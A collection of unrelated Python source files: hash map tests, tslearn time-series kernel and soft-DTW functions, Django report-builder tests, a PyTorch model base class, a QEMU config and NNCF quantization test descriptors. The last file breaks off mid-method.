my_hmap = MyHashMap()
my_hmap.set(53, "Olá")
my_hmap.set(53, "Tudo bem")
self.assertEqual(len(my_hmap), 1)
self.assertEqual(my_hmap.get(53), "Tudo bem")
def test_delete_1(self):
my_hmap = MyHashMap()
my_hmap.set(53, "Olá")
my_hmap.set(5, "Tudo bem")
self.assertEqual(len(my_hmap), 2)
self.assertEqual(my_hmap.get(53), "Olá")
print(my_hmap.arr)
my_hmap.delete(5)
self.assertEqual(len(my_hmap), 1)
self.assertEqual(my_hmap.get(5), None)
print(my_hmap.arr)
if __name__ == "__main__":
unittest.main()
|
497984 | import numpy
from joblib import Parallel, delayed
from numba import njit
from scipy.spatial.distance import pdist, cdist
from sklearn.metrics.pairwise import euclidean_distances
from sklearn.utils import check_random_state
from tslearn.utils import to_time_series, to_time_series_dataset, ts_size, \
check_equal_size
from .utils import _cdist_generic
from .dtw_variants import dtw, dtw_path
from .soft_dtw_fast import _soft_dtw, _soft_dtw_grad, \
_jacobian_product_sq_euc
__author__ = '<NAME> <EMAIL>[at]<EMAIL>'
GLOBAL_CONSTRAINT_CODE = {None: 0, "": 0, "itakura": 1, "sakoe_chiba": 2}
TSLEARN_VALID_METRICS = ["dtw", "gak", "softdtw", "sax"]
VARIABLE_LENGTH_METRICS = ["dtw", "gak", "softdtw", "sax"]
@njit(nogil=True)
def njit_gak(s1, s2, gram):
l1 = s1.shape[0]
l2 = s2.shape[0]
cum_sum = numpy.zeros((l1 + 1, l2 + 1))
cum_sum[0, 0] = 1.
for i in range(l1):
for j in range(l2):
cum_sum[i + 1, j + 1] = (cum_sum[i, j + 1] +
cum_sum[i + 1, j] +
cum_sum[i, j]) * gram[i, j]
return cum_sum[l1, l2]
def _gak_gram(s1, s2, sigma=1.):
gram = - cdist(s1, s2, "sqeuclidean") / (2 * sigma ** 2)
gram -= numpy.log(2 - numpy.exp(gram))
return numpy.exp(gram)
def unnormalized_gak(s1, s2, sigma=1.):
r"""Compute Global Alignment Kernel (GAK) between (possibly
multidimensional) time series and return it.
It is not required that both time series share the same size, but they must
be the same dimension. GAK was
originally presented in [1]_.
This is an unnormalized version.
Parameters
----------
s1
A time series
s2
Another time series
sigma : float (default 1.)
Bandwidth of the internal gaussian kernel used for GAK
Returns
-------
float
Kernel value
Examples
--------
>>> unnormalized_gak([1, 2, 3],
... [1., 2., 2., 3.],
... sigma=2.) # doctest: +ELLIPSIS
15.358...
>>> unnormalized_gak([1, 2, 3],
... [1., 2., 2., 3., 4.]) # doctest: +ELLIPSIS
3.166...
See Also
--------
gak : normalized version of GAK that ensures that k(x,x) = 1
cdist_gak : Compute cross-similarity matrix using Global Alignment kernel
References
----------
.. [1] <NAME>, "Fast global alignment kernels," ICML 2011.
"""
s1 = to_time_series(s1, remove_nans=True)
s2 = to_time_series(s2, remove_nans=True)
gram = _gak_gram(s1, s2, sigma=sigma)
gak_val = njit_gak(s1, s2, gram)
return gak_val
def gak(s1, s2, sigma=1.): # TODO: better doc (formula for the kernel)
r"""Compute Global Alignment Kernel (GAK) between (possibly
multidimensional) time series and return it.
It is not required that both time series share the same size, but they must
be the same dimension. GAK was
originally presented in [1]_.
This is a normalized version that ensures that :math:`k(x,x)=1` for all
:math:`x` and :math:`k(x,y) \in [0, 1]` for all :math:`x, y`.
Parameters
----------
s1
A time series
s2
Another time series
sigma : float (default 1.)
Bandwidth of the internal gaussian kernel used for GAK
Returns
-------
float
Kernel value
Examples
--------
>>> gak([1, 2, 3], [1., 2., 2., 3.], sigma=2.) # doctest: +ELLIPSIS
0.839...
>>> gak([1, 2, 3], [1., 2., 2., 3., 4.]) # doctest: +ELLIPSIS
0.273...
See Also
--------
cdist_gak : Compute cross-similarity matrix using Global Alignment kernel
References
----------
.. [1] <NAME>, "Fast global alignment kernels," ICML 2011.
"""
denom = numpy.sqrt(unnormalized_gak(s1, s1, sigma=sigma) *
unnormalized_gak(s2, s2, sigma=sigma))
return unnormalized_gak(s1, s2, sigma=sigma) / denom
def cdist_gak(dataset1, dataset2=None, sigma=1., n_jobs=None, verbose=0):
r"""Compute cross-similarity matrix using Global Alignment kernel (GAK).
GAK was originally presented in [1]_.
Parameters
----------
dataset1
A dataset of time series
dataset2
Another dataset of time series
sigma : float (default 1.)
Bandwidth of the internal gaussian kernel used for GAK
n_jobs : int or None, optional (default=None)
The number of jobs to run in parallel.
``None`` means 1 unless in a :obj:`joblib.parallel_backend` context.
``-1`` means using all processors. See scikit-learns'
`Glossary <https://scikit-learn.org/stable/glossary.html#term-n-jobs>`__
for more details.
verbose : int, optional (default=0)
The verbosity level: if non zero, progress messages are printed.
Above 50, the output is sent to stdout.
The frequency of the messages increases with the verbosity level.
If it more than 10, all iterations are reported.
`Glossary <https://joblib.readthedocs.io/en/latest/parallel.html#parallel-reference-documentation>`__
for more details.
Returns
-------
numpy.ndarray
Cross-similarity matrix
Examples
--------
>>> cdist_gak([[1, 2, 2, 3], [1., 2., 3., 4.]], sigma=2.)
array([[1. , 0.65629661],
[0.65629661, 1. ]])
>>> cdist_gak([[1, 2, 2], [1., 2., 3., 4.]],
... [[1, 2, 2, 3], [1., 2., 3., 4.], [1, 2, 2, 3]],
... sigma=2.)
array([[0.71059484, 0.29722877, 0.71059484],
[0.65629661, 1. , 0.65629661]])
See Also
--------
gak : Compute Global Alignment kernel
References
----------
.. [1] <NAME>, "Fast global alignment kernels," ICML 2011.
""" # noqa: E501
unnormalized_matrix = _cdist_generic(dist_fun=unnormalized_gak,
dataset1=dataset1,
dataset2=dataset2,
n_jobs=n_jobs,
verbose=verbose,
sigma=sigma,
compute_diagonal=True)
dataset1 = to_time_series_dataset(dataset1)
if dataset2 is None:
diagonal = numpy.diag(numpy.sqrt(1. / numpy.diag(unnormalized_matrix)))
diagonal_left = diagonal_right = diagonal
else:
dataset2 = to_time_series_dataset(dataset2)
diagonal_left = Parallel(n_jobs=n_jobs,
prefer="threads",
verbose=verbose)(
delayed(unnormalized_gak)(dataset1[i], dataset1[i], sigma=sigma)
for i in range(len(dataset1))
)
diagonal_right = Parallel(n_jobs=n_jobs,
prefer="threads",
verbose=verbose)(
delayed(unnormalized_gak)(dataset2[j], dataset2[j], sigma=sigma)
for j in range(len(dataset2))
)
diagonal_left = numpy.diag(1. / numpy.sqrt(diagonal_left))
diagonal_right = numpy.diag(1. / numpy.sqrt(diagonal_right))
return (diagonal_left.dot(unnormalized_matrix)).dot(diagonal_right)
def sigma_gak(dataset, n_samples=100, random_state=None):
r"""Compute sigma value to be used for GAK.
This method was originally presented in [1]_.
Parameters
----------
dataset
A dataset of time series
n_samples : int (default: 100)
Number of samples on which median distance should be estimated
random_state : integer or numpy.RandomState or None (default: None)
The generator used to draw the samples. If an integer is given, it
fixes the seed. Defaults to the global numpy random number generator.
Returns
-------
float
Suggested bandwidth (:math:`\sigma`) for the Global Alignment kernel
Examples
--------
>>> dataset = [[1, 2, 2, 3], [1., 2., 3., 4.]]
>>> sigma_gak(dataset=dataset,
... n_samples=200,
... random_state=0) # doctest: +ELLIPSIS
2.0...
See Also
--------
gak : Compute Global Alignment kernel
cdist_gak : Compute cross-similarity matrix using Global Alignment kernel
References
----------
.. [1] <NAME>, "Fast global alignment kernels," ICML 2011.
"""
random_state = check_random_state(random_state)
dataset = to_time_series_dataset(dataset)
n_ts, sz, d = dataset.shape
if not check_equal_size(dataset):
sz = numpy.min([ts_size(ts) for ts in dataset])
if n_ts * sz < n_samples:
replace = True
else:
replace = False
sample_indices = random_state.choice(n_ts * sz,
size=n_samples,
replace=replace)
dists = pdist(dataset[:, :sz, :].reshape((-1, d))[sample_indices],
metric="euclidean")
return numpy.median(dists) * numpy.sqrt(sz)
def gamma_soft_dtw(dataset, n_samples=100, random_state=None):
r"""Compute gamma value to be used for GAK/Soft-DTW.
This method was originally presented in [1]_.
Parameters
----------
dataset
A dataset of time series
n_samples : int (default: 100)
Number of samples on which median distance should be estimated
random_state : integer or numpy.RandomState or None (default: None)
The generator used to draw the samples. If an integer is given, it
fixes the seed. Defaults to the global numpy random number generator.
Returns
-------
float
Suggested :math:`\gamma` parameter for the Soft-DTW
Examples
--------
>>> dataset = [[1, 2, 2, 3], [1., 2., 3., 4.]]
>>> gamma_soft_dtw(dataset=dataset,
... n_samples=200,
... random_state=0) # doctest: +ELLIPSIS
8.0...
See Also
--------
sigma_gak : Compute sigma parameter for Global Alignment kernel
References
----------
.. [1] <NAME>, "Fast global alignment kernels," ICML 2011.
"""
return 2. * sigma_gak(dataset=dataset,
n_samples=n_samples,
random_state=random_state) ** 2
def soft_dtw(ts1, ts2, gamma=1.):
r"""Compute Soft-DTW metric between two time series.
Soft-DTW was originally presented in [1]_ and is
discussed in more details in our
:ref:`user-guide page on DTW and its variants<dtw>`.
Soft-DTW is computed as:
.. math::
\text{soft-DTW}_{\gamma}(X, Y) =
\min_{\pi}{}^\gamma \sum_{(i, j) \in \pi} \|X_i, Y_j\|^2
where :math:`\min^\gamma` is the soft-min operator of parameter
:math:`\gamma`.
In the limit case :math:`\gamma = 0`, :math:`\min^\gamma` reduces to a
hard-min operator and soft-DTW is defined as the square of the DTW
similarity measure.
Parameters
----------
ts1
A time series
ts2
Another time series
gamma : float (default 1.)
Gamma paraneter for Soft-DTW
Returns
-------
float
Similarity
Examples
--------
>>> soft_dtw([1, 2, 2, 3],
... [1., 2., 3., 4.],
... gamma=1.) # doctest: +NORMALIZE_WHITESPACE +ELLIPSIS
-0.89...
>>> soft_dtw([1, 2, 3, 3],
... [1., 2., 2.1, 3.2],
... gamma=0.01) # doctest: +NORMALIZE_WHITESPACE +ELLIPSIS
0.089...
See Also
--------
cdist_soft_dtw : Cross similarity matrix between time series datasets
References
----------
.. [1] <NAME>, <NAME> "Soft-DTW: a Differentiable Loss Function for
Time-Series," ICML 2017.
"""
if gamma == 0.:
return dtw(ts1, ts2) ** 2
return SoftDTW(SquaredEuclidean(ts1[:ts_size(ts1)], ts2[:ts_size(ts2)]),
gamma=gamma).compute()
def soft_dtw_alignment(ts1, ts2, gamma=1.):
r"""Compute Soft-DTW metric between two time series and return both the
similarity measure and the alignment matrix.
Soft-DTW was originally presented in [1]_ and is
discussed in more details in our
:ref:`user-guide page on DTW and its variants<dtw>`.
Soft-DTW is computed as:
.. math::
\text{soft-DTW}_{\gamma}(X, Y) =
\min_{\pi}{}^\gamma \sum_{(i, j) \in \pi} \|X_i, Y_j\|^2
where :math:`\min^\gamma` is the soft-min operator of parameter
:math:`\gamma`.
In the limit case :math:`\gamma = 0`, :math:`\min^\gamma` reduces to a
hard-min operator and soft-DTW is defined as the square of the DTW
similarity measure.
Parameters
----------
ts1
A time series
ts2
Another time series
gamma : float (default 1.)
Gamma paraneter for Soft-DTW
Returns
-------
numpy.ndarray
Soft-alignment matrix
float
Similarity
Examples
--------
>>> a, dist = soft_dtw_alignment([1, 2, 2, 3],
... [1., 2., 3., 4.],
... gamma=1.) # doctest: +ELLIPSIS
>>> dist
-0.89...
>>> a # doctest: +ELLIPSIS +NORMALIZE_WHITESPACE
array([[1.00...e+00, 1.88...e-01, 2.83...e-04, 4.19...e-11],
[3.40...e-01, 8.17...e-01, 8.87...e-02, 3.94...e-05],
[5.05...e-02, 7.09...e-01, 5.30...e-01, 6.98...e-03],
[1.37...e-04, 1.31...e-01, 7.30...e-01, 1.00...e+00]])
See Also
--------
soft_dtw : Returns soft-DTW score alone
References
----------
.. [1] <NAME>, <NAME> "Soft-DTW: a Differentiable Loss Function for
Time-Series," ICML 2017.
"""
if gamma == 0.:
path, dist = dtw_path(ts1, ts2)
dist_sq = dist ** 2
a = numpy.zeros((ts_size(ts1), ts_size(ts2)))
for i, j in path:
a[i, j] = 1.
else:
sdtw = SoftDTW(SquaredEuclidean(ts1[:ts_size(ts1)], ts2[:ts_size(ts2)]),
gamma=gamma)
dist_sq = sdtw.compute()
a = sdtw.grad()
return a, dist_sq
def cdist_soft_dtw(dataset1, dataset2=None, gamma=1.):
r"""Compute cross-similarity matrix using Soft-DTW metric.
Soft-DTW was originally presented in [1]_ and is
discussed in more details in our
:ref:`user-guide page on DTW and its variants<dtw>`.
Soft-DTW is computed as:
.. math::
\text{soft-DTW}_{\gamma}(X, Y) =
\min_{\pi}{}^\gamma \sum_{(i, j) \in \pi} \|X_i, Y_j\|^2
where :math:`\min^\gamma` is the soft-min operator of parameter
:math:`\gamma`.
In the limit case :math:`\gamma = 0`, :math:`\min^\gamma` reduces to a
hard-min operator and soft-DTW is defined as the square of the DTW
similarity measure.
Parameters
----------
dataset1
A dataset of time series
dataset2
Another dataset of time series
gamma : float (default 1.)
Gamma paraneter for Soft-DTW
Returns
-------
numpy.ndarray
Cross-similarity matrix
Examples
--------
>>> cdist_soft_dtw([[1, 2, 2, 3], [1., 2., 3., 4.]], gamma=.01)
array([[-0.01098612, 1. ],
[ 1. , 0. ]])
>>> cdist_soft_dtw([[1, 2, 2, 3], [1., 2., 3., 4.]],
... [[1, 2, 2, 3], [1., 2., 3., 4.]], gamma=.01)
array([[-0.01098612, 1. ],
[ 1. , 0. ]])
See Also
--------
soft_dtw : Compute Soft-DTW
cdist_soft_dtw_normalized : Cross similarity matrix between time series
datasets using a normalized version of Soft-DTW
References
----------
.. [1] <NAME>, <NAME> "Soft-DTW: a Differentiable Loss Function for
Time-Series," ICML 2017.
"""
dataset1 = to_time_series_dataset(dataset1, dtype=numpy.float64)
self_similarity = False
if dataset2 is None:
dataset2 = dataset1
self_similarity = True
else:
dataset2 = to_time_series_dataset(dataset2, dtype=numpy.float64)
dists = numpy.empty((dataset1.shape[0], dataset2.shape[0]))
equal_size_ds1 = check_equal_size(dataset1)
equal_size_ds2 = check_equal_size(dataset2)
for i, ts1 in enumerate(dataset1):
if equal_size_ds1:
ts1_short = ts1
else:
ts1_short = ts1[:ts_size(ts1)]
for j, ts2 in enumerate(dataset2):
if equal_size_ds2:
ts2_short = ts2
else:
ts2_short = ts2[:ts_size(ts2)]
if self_similarity and j < i:
dists[i, j] = dists[j, i]
else:
dists[i, j] = soft_dtw(ts1_short, ts2_short, gamma=gamma)
return dists
def cdist_soft_dtw_normalized(dataset1, dataset2=None, gamma=1.):
r"""Compute cross-similarity matrix using a normalized version of the
Soft-DTW metric.
Soft-DTW was originally presented in [1]_ and is
discussed in more details in our
:ref:`user-guide page on DTW and its variants<dtw>`.
Soft-DTW is computed as:
.. math::
\text{soft-DTW}_{\gamma}(X, Y) =
\min_{\pi}{}^\gamma \sum_{(i, j) \in \pi} \|X_i, Y_j\|^2
where :math:`\min^\gamma` is the soft-min operator of parameter
:math:`\gamma`.
In the limit case :math:`\gamma = 0`, :math:`\min^\gamma` reduces to a
hard-min operator and soft-DTW is defined as the square of the DTW
similarity measure.
This normalized version is defined as:
.. math::
\text{norm-soft-DTW}_{\gamma}(X, Y) =
\text{soft-DTW}_{\gamma}(X, Y) -
\frac{1}{2} \left(\text{soft-DTW}_{\gamma}(X, X) +
\text{soft-DTW}_{\gamma}(Y, Y)\right)
and ensures that all returned values are positive and that
:math:`\text{norm-soft-DTW}_{\gamma}(X, X) = 0`.
Parameters
----------
dataset1
A dataset of time series
dataset2
Another dataset of time series
gamma : float (default 1.)
Gamma paraneter for Soft-DTW
Returns
-------
numpy.ndarray
Cross-similarity matrix
Examples
--------
>>> time_series = numpy.random.randn(10, 15, 1)
>>> numpy.alltrue(cdist_soft_dtw_normalized(time_series) >= 0.)
True
See Also
--------
soft_dtw : Compute Soft-DTW
cdist_soft_dtw : Cross similarity matrix between time series
datasets using the unnormalized version of Soft-DTW
References
----------
.. [1] <NAME>, <NAME> "Soft-DTW: a Differentiable Loss Function for
Time-Series," ICML 2017.
"""
dists = cdist_soft_dtw(dataset1, dataset2=dataset2, gamma=gamma)
d_ii = numpy.diag(dists)
dists -= .5 * (d_ii.reshape((-1, 1)) + d_ii.reshape((1, -1)))
return dists
class SoftDTW:
def __init__(self, D, gamma=1.):
"""
Parameters
----------
gamma: float
Regularization parameter.
Lower is less smoothed (closer to true DTW).
Attributes
----------
self.R_: array, shape = [m + 2, n + 2]
Accumulated cost matrix (stored after calling `compute`).
"""
if hasattr(D, "compute"):
self.D = D.compute()
else:
self.D = D
self.D = self.D.astype(numpy.float64)
# Allocate memory.
# We need +2 because we use indices starting from 1
# and to deal with edge cases in the backward recursion.
m, n = self.D.shape
self.R_ = numpy.zeros((m + 2, n + 2), dtype=numpy.float64)
self.computed = False
self.gamma = numpy.float64(gamma)
def compute(self):
"""Compute soft-DTW by dynamic programming.
Returns
-------
sdtw: float
soft-DTW discrepancy.
"""
m, n = self.D.shape
_soft_dtw(self.D, self.R_, gamma=self.gamma)
self.computed = True
return self.R_[m, n]
def grad(self):
"""Compute gradient of soft-DTW w.r.t. D by dynamic programming.
Returns
-------
grad: array, shape = [m, n]
Gradient w.r.t. D.
"""
if not self.computed:
raise ValueError("Needs to call compute() first.")
m, n = self.D.shape
# Add an extra row and an extra column to D.
# Needed to deal with edge cases in the recursion.
D = numpy.vstack((self.D, numpy.zeros(n)))
D = numpy.hstack((D, numpy.zeros((m + 1, 1))))
# Allocate memory.
# We need +2 because we use indices starting from 1
# and to deal with edge cases in the recursion.
E = numpy.zeros((m + 2, n + 2), dtype=numpy.float64)
_soft_dtw_grad(D, self.R_, E, gamma=self.gamma)
return E[1:-1, 1:-1]
class SquaredEuclidean:
def __init__(self, X, Y):
"""
Parameters
----------
X: array, shape = [m, d]
First time series.
Y: array, shape = [n, d]
Second time series.
Examples
--------
>>> SquaredEuclidean([1, 2, 2, 3], [1, 2, 3, 4]).compute()
array([[0., 1., 4., 9.],
[1., 0., 1., 4.],
[1., 0., 1., 4.],
[4., 1., 0., 1.]])
"""
self.X = to_time_series(X).astype(numpy.float64)
self.Y = to_time_series(Y).astype(numpy.float64)
def compute(self):
"""Compute distance matrix.
Returns
-------
D: array, shape = [m, n]
Distance matrix.
"""
return euclidean_distances(self.X, self.Y, squared=True)
def jacobian_product(self, E):
"""Compute the product between the Jacobian
(a linear map from m x d to m x n) and a matrix E.
Parameters
----------
E: array, shape = [m, n]
Second time series.
Returns
-------
G: array, shape = [m, d]
Product with Jacobian
([m x d, m x n] * [m x n] = [m x d]).
"""
G = numpy.zeros_like(self.X, dtype=numpy.float64)
_jacobian_product_sq_euc(self.X, self.Y, E.astype(numpy.float64), G)
return G
|
498004 | from django.contrib.contenttypes.models import ContentType
from django.conf import settings
from django.test import TestCase
from ..utils import (
get_properties_from_model, get_direct_fields_from_model,
get_relation_fields_from_model, get_model_from_path_string)
from ..mixins import GetFieldsMixin
from ..models import Report, DisplayField, FilterField
from report_builder_demo.demo_models.models import (
Bar, Restaurant, Waiter, Comment, Place)
class RelationUtilityFunctionTests(TestCase):
def test_a_initial_rel_field_name(self):
"""
Test that the initial assumption about the ManyToOneRel field_name is
correct
"""
field_name = (
Waiter.restaurant.field.rel.field_name
if hasattr(Waiter.restaurant.field, 'rel')
else Waiter.restaurant.field.target_field.name
)
self.assertEquals(field_name, "place")
def test_get_relation_fields_from_model_does_not_change_field_name(self):
"""
Make sure that getting related_fields doesn't overwrite field_name
Waiter has a ForeignKey to Restaurant.
The relation from Restaurant to Waiter is a ManyToOneRel object.
'place' is the PK of Restaurant. The ManyToOneRel field_name should be
the same at the PK, unless to_field is set on the ForeignKey.
ManyToManyRel objects are not affected.
"""
get_relation_fields_from_model(Restaurant)
field_name = (
Waiter.restaurant.field.rel.field_name
if hasattr(Waiter.restaurant.field, 'rel')
else Waiter.restaurant.field.target_field.name
)
self.assertEquals(field_name, "place")
# Waiter.restaurant.field.rel.get_related_field()
class UtilityFunctionTests(TestCase):
def setUp(self):
self.report_ct = ContentType.objects.get_for_model(Report)
self.report = Report.objects.create(
name="foo report",
root_model=self.report_ct)
self.filter_field = FilterField.objects.create(
report=self.report,
field="X",
field_verbose="stuff",
filter_type='contains',
filter_value='Lots of spam')
def get_fields_names(self, fields):
return [field.name for field in fields]
def test_get_relation_fields_from_model(self):
fields = get_relation_fields_from_model(Report)
names = self.get_fields_names(fields)
self.assertTrue('displayfield' in names or 'report_builder:displayfield' in names)
self.assertTrue('filterfield' in names or 'report_builder:filterfield' in names)
self.assertTrue('root_model' in names)
self.assertEquals(len(names), 7)
def test_get_model_from_path_string(self):
result = get_model_from_path_string(Restaurant, 'waiter__name')
self.assertEqual(result, Waiter)
def test_get_model_from_path_string_one_to_one(self):
"""Test that one-to-one relationships don't break this function"""
result = get_model_from_path_string(Restaurant, 'place__serves_pizza')
self.assertEqual(result, Place)
def test_get_direct_fields_from_model(self):
fields = get_direct_fields_from_model(Report)
names = self.get_fields_names(fields)
self.assertTrue('created' in names)
self.assertTrue('description' in names)
self.assertTrue('distinct' in names)
self.assertTrue('id' in names)
self.assertEquals(len(names), 9)
def test_get_fields(self):
""" Test GetFieldsMixin.get_fields """
obj = GetFieldsMixin()
obj.get_fields(
Bar,
"foos",
)
def test_get_gfk_fields_from_model(self):
fields = get_direct_fields_from_model(Comment)
def test_get_properties_from_model(self):
properties = get_properties_from_model(DisplayField)
self.assertEquals(properties[0]['label'], 'choices')
self.assertEquals(properties[1]['label'], 'choices_dict')
def test_filter_property(self):
# Not a very complete test - only tests one type of filter
result = self.filter_field.filter_property('spam')
self.assertTrue(result)
def test_custom_global_model_manager(self):
""" test for custom global model manager """
if getattr(settings, 'REPORT_BUILDER_MODEL_MANAGER', False):
self.assertEquals(
self.report._get_model_manager(),
settings.REPORT_BUILDER_MODEL_MANAGER)
def test_custom_model_manager(self):
""" test for custom model manager """
if getattr(
self.report.root_model.model_class(),
'report_builder_model_manager',
True
):
# change setup to use actual field and value
self.filter_field.field = 'name'
self.filter_field.filter_value = 'foo'
self.filter_field.save()
# coverage of get_query
objects = self.report.get_query()
# expect custom manager to return correct object with filters
self.assertEquals(objects[0], self.report)
|
498077 | import os
from itertools import product
import auditing_args
from collections import defaultdict
BATCH_SIZE = 50
data_dir = auditing_args.args["save_dir"]
h5s = [fname for fname in os.listdir(data_dir) if fname.endswith('.h5')]
def get_cfg(h5):
splt = h5.split('-')
if 'no' in h5:
return ('no', '.', splt[2], splt[3], splt[4])
else:
return ('new', splt[1], splt[2], splt[3], splt[4])
cfg_map = defaultdict(list)
for h5 in h5s:
cfg_map[get_cfg(h5)].append(h5)
args = {d: len(cfg_map[d]) for d in cfg_map if len(cfg_map[d]) > 0}
print(args)
all_exp = []
def run_exp(cmd):
cmd = "CUDA_VISIBLE_DEVICES= "+cmd
print(cmd)
os.system(cmd)
fmt_cmd = "python make_nps.py {} {} {} {} {} {} {}"
for arg in args:
for start in range(0, args[arg], BATCH_SIZE):
cmd = fmt_cmd.format(arg[0], start, start + BATCH_SIZE, arg[1], arg[2], arg[3], arg[4])
all_exp.append(cmd)
print(len(args), len(all_exp))
import multiprocessing as mp
p = mp.Pool(16)
p.map(run_exp, all_exp)
|
498095 | from .conv import conv_layer, norm_layer, ConvModule
from .nms import multiclass_nms
from .anchor_generator import AnchorGenerator
from .bbox import delta2bbox, bbox2result
__all__ = ['conv_layer', 'norm_layer', 'ConvModule', 'nms', 'AnchorGenerator', 'delta2bbox', 'multiclass_nms', 'bbox2result']
|
498111 | from .bitmovin_error import BitmovinError
from .bitmovin_api_error import BitmovinApiError
from .invalid_status_error import InvalidStatusError
from .invalid_type_error import InvalidTypeError
from .unique_constraint_violation_error import UniqueConstraintViolationException
from .missing_argument_error import MissingArgumentError
from .functionality_not_available_error import FunctionalityNotAvailableError
from .timeout_error import TimeoutError
|
498117 | import torch
import gym
import numpy as np
from .utils import make_tensor
class TorchModel(torch.nn.Module):
"""Base class for all pytorch models"""
def __init__(self, observation_space):
"""Initializes the model with the given observation space
Currently supported observation spaces are:
- Box spaces
- A tuple of box spaces, where the 1st one is the 'main' observation,
and the rest contain additional 1D vectors of linear features for
the model which are fed to one of the non-convolutional layers
(Usually the RNN layer)
"""
super().__init__()
# When using multiple actors each with it's own CPU copy of the model,
# we need to limit them to be single-threaded otherwise they slow each
# other down. This should not effect training time if training is on
# the GPU
torch.set_num_threads(1)
self._setup_inputs(observation_space)
def _setup_inputs(self, obs_space):
"""Sets up the input sizes based on the given observation space"""
assert(isinstance(obs_space, (gym.spaces.Box, gym.spaces.Tuple))), \
"TorchModel currently only supports Box or Tuple as the " \
"observation space"
if isinstance(obs_space, gym.spaces.Box):
# Basic case of just a single box space, no extra input features
self.main_input_shape = obs_space.shape
self.extra_input_shape = None
else:
# For now we just support the basic case where all spaces are Box
# (i.e. no nested tuple spaces), and only the 1st space is the main
# space, while the rest of the spaces are 1D extra feature vectors
assert(np.all([
isinstance(space, gym.spaces.Box)
for space in obs_space.spaces])), \
"TorchModel only supports tuples of boxes as the observation "\
"space"
# TODO: Support multiple main spaces and nested tuples??
assert(np.all(
[len(space.shape) == 1 for space in obs_space.spaces[1:]])), \
"TorchModel currently only supports 1D box spaces for the " \
" non-main observation space"
self.main_input_shape = obs_space.spaces[0].shape
self.extra_input_shape = (
np.sum([space.shape for space in obs_space.spaces[1:]]),)
def _get_inputs(self, inp):
"""Returns the the input separated into the 'main input' and the
'extra inputs' (If applicable, i.e. if it's a tuple observation space)
"""
if not isinstance(inp, tuple):
return (inp, None)
else:
return (inp[0], torch.cat(inp[1:], dim=-1))
def is_recurrent(self):
raise NotImplementedError
def set_layer_preprocessor(self, layer_index, preprocessor):
raise NotImplementedError
|
498136 | from ..qemu_config import QemuArchParams
QEMU_ARCH = QemuArchParams(linux_arch='x86_64',
kconfig='''
CONFIG_SERIAL_8250=y
CONFIG_SERIAL_8250_CONSOLE=y''',
qemu_arch='x86_64',
kernel_path='arch/x86/boot/bzImage',
kernel_command_line='console=ttyS0',
extra_qemu_params=[''])
|
498162 | from abc import ABC
from pathlib import Path
from typing import Dict
import pytest
from torch import nn
from nncf import NNCFConfig
from nncf.common.quantization.structs import QuantizerConfig
from nncf.torch.quantization.algo import QuantizationController
from tests.common.helpers import TEST_ROOT
from tests.torch.sample_test_validator import SampleType
from tests.torch.sample_test_validator import SanitySampleValidator
from tests.torch.sample_test_validator import SanityTestCaseDescriptor
class PrecisionTestCaseDescriptor(SanityTestCaseDescriptor, ABC):
def __init__(self):
super().__init__()
self.num_weight_quantizers_: int = 0
self.num_activation_quantizers_: int = 0
@property
def config_directory(self) -> Path:
return TEST_ROOT.joinpath("torch", "data", "configs", "hawq")
def get_precision_section(self) -> Dict:
raise NotImplementedError
def get_compression_section(self):
quantization_section = {
'algorithm': 'quantization',
'initializer': {
'precision': self.get_precision_section(),
'range': {
"num_init_samples": 2
},
"batchnorm_adaptation": {
"num_bn_adaptation_samples": 1
}
},
}
if self.sample_type_ == SampleType.CLASSIFICATION_STAGED:
quantization_section.update({'params': {"activations_quant_start_epoch": 0}})
return quantization_section
def num_weight_quantizers(self, n: int):
self.num_weight_quantizers_ = n
return self
def num_activation_quantizers(self, n: int):
self.num_activation_quantizers_ = n
return self
class PrecisionSampleValidator(SanitySampleValidator):
def __init__(self, desc: PrecisionTestCaseDescriptor):
super().__init__(desc)
self._train_mock = None
def setup_spy(self, mocker):
train_location = self._sample_handler.get_train_location()
self._train_mock = mocker.patch(train_location)
# Need to mock SafeMLFLow to prevent starting a not closed mlflow session due to memory leak of config and
# SafeMLFLow, which happens with a mocked train function
self._sample_handler.mock_mlflow(mocker)
def validate_spy(self):
self._train_mock.assert_called_once()
class HAWQTestCaseDescriptor(PrecisionTestCaseDescriptor):
def __init__(self):
super().__init__()
self.batch_size_init_: int = 0
def get_validator(self):
return HAWQSampleValidator(self)
def batch_size_init(self, batch_size_init: int):
self.batch_size_init_ = batch_size_init
return self
def get_sample_params(self):
result = super().get_sample_params()
result.update({'batch_size_init': self.batch_size_init_} if self.batch_size_init_ else {})
return result
def get_precision_section(self) -> Dict:
return {"type": "hawq",
"num_data_points": 3,
"iter_number": 1}
def __str__(self):
bs = f'_bs{self.batch_size_init_}' if self.batch_size_init_ else ''
return super().__str__() + '_hawq' + bs
class HAWQSampleValidator(PrecisionSampleValidator):
def __init__(self, desc: HAWQTestCaseDescriptor):
super().__init__(desc)
self._desc = desc
self.get_qsetup_spy = None
self.hessian_trace_estimator_spy = None
def setup_spy(self, mocker):
super().setup_spy(mocker)
from nncf.torch.quantization.init_precision import HAWQPrecisionInitializer
self.get_qsetup_spy = mocker.spy(HAWQPrecisionInitializer, "get_quantizer_setup_for_qconfig_sequence")
from nncf.torch.quantization.hessian_trace import HessianTraceEstimator
self.hessian_trace_estimator_spy = mocker.spy(HessianTraceEstimator, "__init__")
def validate_spy(self):
super().validate_spy()
qconfig_sequence = self.get_qsetup_spy.call_args[0][1]
assert len(qconfig_sequence) == self._desc.num_weight_quantizers_
all_precisions = {qc.num_bits for qc in qconfig_sequence}
# with default compression ratio = 1.5 all precisions should be different from the default one
assert all_precisions != {QuantizerConfig().num_bits}
init_data_loader = self.hessian_trace_estimator_spy.call_args[0][5]
expected_batch_size = self._desc.batch_size_init_ if self._desc.batch_size_init_ else self._desc.batch_size_
assert init_data_loader.batch_size == expected_batch_size
class AutoQTestCaseDescriptor(PrecisionTestCaseDescriptor):
def __init__(self):
super().__init__()
self.subset_ratio_: float = 1.0
self.BITS = [2, 4, 8]
self.debug_dump: bool = False
def get_validator(self):
return AutoQSampleValidator(self)
def subset_ratio(self, subset_ratio_: float):
self.subset_ratio_ = subset_ratio_
return self
def dump_debug(self, debug_dump: bool):
self.debug_dump = debug_dump
return self
def get_precision_section(self) -> Dict:
return {"type": "autoq",
"bits": self.BITS,
"iter_number": 2,
"compression_ratio": 0.15,
"eval_subset_ratio": self.subset_ratio_,
"dump_init_precision_data": self.debug_dump}
def __str__(self):
sr = f'_sr{self.subset_ratio_}' if self.subset_ratio_ else ''
dd = '_dump_debug' if self.debug_dump else ''
